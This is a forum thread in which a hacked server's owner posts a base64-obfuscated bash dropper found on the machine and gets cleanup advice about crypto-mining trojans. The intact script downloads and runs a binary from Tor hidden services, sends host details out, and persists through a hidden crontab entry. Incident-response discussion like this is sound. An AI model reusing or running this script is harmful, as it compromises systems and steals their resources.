V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
nimab
V2EX  ›  Bash

生产服务器集群被黑了,帮看看这个脚本

  •  
  •   nimab · 2020-09-02 16:29:16 +08:00 · 3352 次点击
    这是一个创建于 1303 天前的主题,其中的信息可能已经有所发展或是发生改变。

    #!/bin/bash

    exec &>/dev/null

    echo ncM85D4kux95mCiJpO2bEuK6pSDgAxyo8iDwzI2aeW4D9rutGHUWkn85gtzMkzxU

    echo bmNNODVENGt1eDk1bUNpSnBPMmJFdUs2cFNEZ0F4eW84aUR3ekkyYWVXNEQ5cnV0R0hVV2tuODVndHpNa3p4VQpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICI0aXVjaWd4dmxmeDR2Y3FuNXNvcmRlcnNhYTNhM3p0amNhb3N6cHR4eG81YjNwYm42bmx3c2ZhZCIpCgpzb2NreigpIHsKbj0oZG9oLmRlZmF1bHRyb3V0ZXMuZGUgZG5zLmhvc3R1eC5uZXQgZG5zLmRucy1vdmVyLWh0dHBzLmNvbSB1bmNlbnNvcmVkLmx1eDEuZG5zLm5peG5ldC54eXogZG5zLnJ1YnlmaXNoLmNuIGRucy50d25pYy50dyBkb2guY2VudHJhbGV1LnBpLWRucy5jb20gZG9oLmRucy5zYiBkb2gtZmkuYmxhaGRucy5jb20gZmkuZG9oLmRucy5zbm9weXRhLm9yZyBkbnMuZmxhdHVzbGlmaXIuaXMgZG9oLmxpIGRucy5kaWdpdGFsZS1nZXNlbGxzY2hhZnQuY2gpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpzPSQoJGMgaHR0cHM6Ly8ke25bJCgoUkFORE9NJTEzKSldfS8kcCB8IGdyZXAgLW9FICJcYihbMC05XXsxLDN9XC4pezN9WzAtOV17MSwzfVxiIiB8dHIgJyAnICdcbid8c29ydCAtdVJ8aGVhZCAtMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdG1wIC92YXIvdG1wIDtkbyBlY2hvIGV4aXQgPiAkaS9pICYmIGNobW9kICt4ICRpL2kgJiYgY2QgJGkgJiYgLi9pICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp9Cgp1KCkgewpzb2NregpmZXhlCmY9L2ludC4kKHVuYW1lIC1tKQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKcj0kKGN1cmwgLTRmc1NMayBjaGVja2lwLmFtYXpvbmF3cy5jb218fGN1cmwgLTRmc1NMayBpcC5zYilfJCh3aG9hbWkpXyQodW5hbWUgLW0pXyQodW5hbWUgLW4pXyQoaXAgYXxncmVwICdpbmV0ICd8YXdrIHsncHJpbnQgJDInfXxtZDVzdW18YXdrIHsncHJpbnQgJDEnfSlfJChjcm9udGFiIC1sfGJhc2U2NCAtdzApCiRjIC14IHNvY2tzNWg6Ly8kczo5MDUwICR0Lm9uaW9uJGYgLW8keCAtZSRyIHx8ICRjICQxJGYgLW8keCAtZSRyCmNobW9kICt4ICR4OyR4O3JtIC1mICR4Cn0KCmZvciBoIGluIHRvcjJ3ZWIuaW4gdG9yMndlYi5pdCB0b3Iyd2ViLmlvIHRvcjJ3ZWIuc3Ugb25pb24uY29tLmRlIHRvcjJ3ZWIudG8gb25pb24uc2gKZG8KaWYgISBscyAvcHJvYy8kKGhlYWQgLTEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgp1ICR0LiRoCmVsc2UKYnJlYWsKZmkKZG9uZQo=|base64 -d|bash

    crontab 里这个 20 * * * * /root/.systemd-service.sh > /dev/null 2>&1 &

    清理 crontab 是没用的。

    6 条回复    2021-01-21 11:34:50 +08:00
    uncat
        1
    uncat  
       2020-09-02 21:44:49 +08:00
    这个文件: /root/.systemd-service.sh 的内容是上面这个?
    uncat
        2
    uncat  
       2020-09-02 22:28:50 +08:00
    搜索一下一个类似于这样的进程: e4133fc85b74c4a791611e2ced190609 (预计是 33 个字符组成) kill 掉它
    uncat
        3
    uncat  
       2020-09-02 22:43:27 +08:00   ❤️ 1
    https://www.cnblogs.com/royfans/p/12722792.html 这篇文章很类似可以参考一下.
    ward56
        4
    ward56  
       2021-01-21 10:11:29 +08:00   ❤️ 1
    根据以往经验,这是一个挖矿子进程的脚本,需要 base64 解码,一般解码出来就是请求一个 url 及一些优化你系统的脚本,你不需要去分析它的内容。
    主进程一般在 /etc/cron.d/0systemd
    1 子进程 .systemd-service.sh 隐藏脚本
    2 子进程 根目录下的某个目录下 systemd-service.sh 脚本

    解决方法:
    1. find 上述 3 个进程脚本和计划任务,删除掉
    2.找到上述系统上对应的恶意程序 kill 掉
    3.用 lsof 找到 /proc 内存里已经删除源脚本的进程杀掉
    4 ./bin/ 下的所有命令不要执行,尤其 url culr wget 等命令,找一个健康的干净系统,把系统里 /bin 下命令还原覆盖到这个系统里。

    验证:
    重启操作系统,观察一个周期确定是否进程还会启动
    nimab
        5
    nimab  
    OP
       2021-01-21 11:02:26 +08:00
    @ward56 上个月又中一次,清掉了,主要就是删掉进程,封掉那些 url,一个多月再没出现。现在问题就是内存使用比之前高一些,找不到原因。
    ward56
        6
    ward56  
       2021-01-21 11:34:50 +08:00
    @nimab 封掉 url 治标不治本,实际挖矿木马有休眠期,不会一直运行。
    其它健康的服务器,你可以给 openssh 加固,该打补丁的打补丁,该加策略的加策略。
    已经中招的服务器按照我发的方法做一遍,关键点是找到对应的 /proc 里的进程对应的程序。(封掉 url 之后非常难定位问题,建议放行 url,把问题爆露出来,全面分析下)
    思路就这么简单,你再尝试深挖 linux 进程会变得更有趣。

    现在的挖矿木马太多,主要以下大类:
    初版的 linux 挖矿程序通过 计划任务执行 crontab 里
    进阶版的 linux 挖矿程序通过
    1.隐藏文件运行,或者通过加密的脚本。
    2.脚本内容一般是重命名的 cur 或 wge 拉取外网的脚本或程序
    3.然后删除本地运行的源程序
    最终实现,无本地运行程序方式实现挖矿。
    高级进阶版
    入侵系统之后,先给系统做全面性能优化
    包含;内核参数优化 / 性能优化(杀掉占用资源过高的程序,你自己运行的服务)
    没有计划任务跑挖矿程序,没有链接公网需求,一次非守护运行。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   我们的愿景   ·   实用小工具   ·   5671 人在线   最高记录 6543   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 33ms · UTC 01:45 · PVG 09:45 · LAX 18:45 · JFK 21:45
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.